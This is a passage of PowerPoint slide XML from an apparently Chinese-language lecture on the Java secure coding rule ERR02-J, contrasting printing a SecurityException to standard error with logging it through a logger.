            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="2013809"/>
            <a:ext cx="9073008" cy="4656571"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="460" name="Shape 460"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1775519" y="3573016"/>
            <a:ext cx="8496944" cy="2160240"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99CCFF">
              <a:alpha val="13725"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="39999" rotWithShape="0" dir="5400000" dist="20000">
              <a:srgbClr val="000000">
                <a:alpha val="37647"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>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Font typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>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65" name="Shape 465"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="466" name="Shape 466"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123016" y="183923"/>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ERR02-J. Prevent Exceptions while </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" i="0" lang="zh-TW" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" i="0" lang="zh-TW" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:rPr>
              <a:t>Logging Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="467" name="Shape 467"/>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
        <p:nvSpPr>
          <p:cNvPr id="468" name="Shape 468"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1919535" y="2402159"/>
            <a:ext cx="11074399" cy="4038599"/>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25000"/>
              <a:buFont typeface="Gill Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="zh-TW" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>try</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="zh-TW" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> { </a:t>
            </a:r>
            <a:br>
              <a:rPr b="0" i="0" lang="zh-TW" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="0" i="0" lang="zh-TW" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="zh-TW" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>// ... </a:t>
            </a:r>
            <a:br>
              <a:rPr b="0" i="0" lang="zh-TW" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="0" i="0" lang="zh-TW" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="zh-TW" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>catch</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="zh-TW" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> (SecurityException se) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342891" lvl="0" marL="342891" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Gill Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="zh-TW" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="zh-TW" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>System.err.println(e); </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="zh-TW" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="zh-TW" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Recover from exception </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342891" lvl="0" marL="342891" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Gill Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="zh-TW" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>	} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342891" lvl="0" marL="342891" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Gill Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="zh-TW" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="469" name="Shape 469"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1115244" y="1452834"/>
            <a:ext cx="10858500" cy="796924"/>
            <a:chOff x="601472" y="170031"/>
            <a:chExt cx="8420607" cy="797039"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="470" name="Shape 470"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="601472" y="170031"/>
              <a:ext cx="8420607" cy="797039"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd fmla="val 16667" name="adj"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="022484"/>
            </a:solidFill>
            <a:ln cap="flat" cmpd="sng" w="25400">
              <a:solidFill>
                <a:schemeClr val="lt1"/>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471" name="Shape 471"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="640866" y="209725"/>
              <a:ext cx="8341818" cy="717653"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="318275" rIns="318275" tIns="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buSzPct val="25000"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr b="1" lang="zh-TW" sz="2800">
                  <a:solidFill>
                    <a:schemeClr val="lt1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>Noncompliant  Code  Example</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="472" name="Shape 472"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1439094" y="5362846"/>
            <a:ext cx="10210799" cy="1077217"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CDE6FF"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="zh-TW" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>應該要將異常的訊息記錄到Log中，而非單純的利用標準錯誤輸出。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="473" name="Shape 473"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3287687" y="3591219"/>
            <a:ext cx="8280919" cy="648071"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:alpha val="13725"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="BD4B48"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="39999" rotWithShape="0" dir="5400000" dist="20000">
              <a:srgbClr val="000000">
                <a:alpha val="37647"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>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Font typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>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78" name="Shape 478"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="479" name="Shape 479"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123016" y="170543"/>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ERR02-J. Prevent exceptions while </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" i="0" lang="zh-TW" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" i="0" lang="zh-TW" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:rPr>
              <a:t>logging data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="480" name="Shape 480"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="481" name="Shape 481"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1055440" y="1693252"/>
            <a:ext cx="10858500" cy="685799"/>
            <a:chOff x="601472" y="170031"/>
            <a:chExt cx="8420607" cy="797039"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="482" name="Shape 482"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="601472" y="170031"/>
              <a:ext cx="8420607" cy="797039"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd fmla="val 16667" name="adj"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="022484"/>
            </a:solidFill>
            <a:ln cap="flat" cmpd="sng" w="25400">
              <a:solidFill>
                <a:schemeClr val="lt1"/>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483" name="Shape 483"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="640866" y="208777"/>
              <a:ext cx="8341818" cy="719549"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="318275" rIns="318275" tIns="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buSzPct val="25000"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr b="1" lang="zh-TW" sz="2800">
                  <a:solidFill>
                    <a:schemeClr val="lt1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>Compliant Solution</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="484" name="Shape 484"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1054350" y="2708919"/>
            <a:ext cx="12217400" cy="4419599"/>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25000"/>
              <a:buFont typeface="Gill Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="zh-TW" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>try</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="zh-TW" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> { </a:t>
            </a:r>
            <a:br>
              <a:rPr b="0" i="0" lang="zh-TW" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="0" i="0" lang="zh-TW" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="zh-TW" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>// ... </a:t>
            </a:r>
            <a:br>
              <a:rPr b="0" i="1" lang="zh-TW" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="0" i="0" lang="zh-TW" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="zh-TW" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>catch</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="zh-TW" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> (SecurityException se) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342891" lvl="0" marL="342891" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Gill Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="zh-TW" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="zh-TW" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>logger.log(Level.SEVERE, se);</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="zh-TW" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="zh-TW" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>// Recover from exception </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342891" lvl="0" marL="342891" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Gill Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="zh-TW" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>	} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342891" lvl="0" marL="342891" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Gill Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="zh-TW" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="485" name="Shape 485"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2639616" y="3933055"/>
            <a:ext cx="9223523" cy="567815"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99CCFF">
              <a:alpha val="13725"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
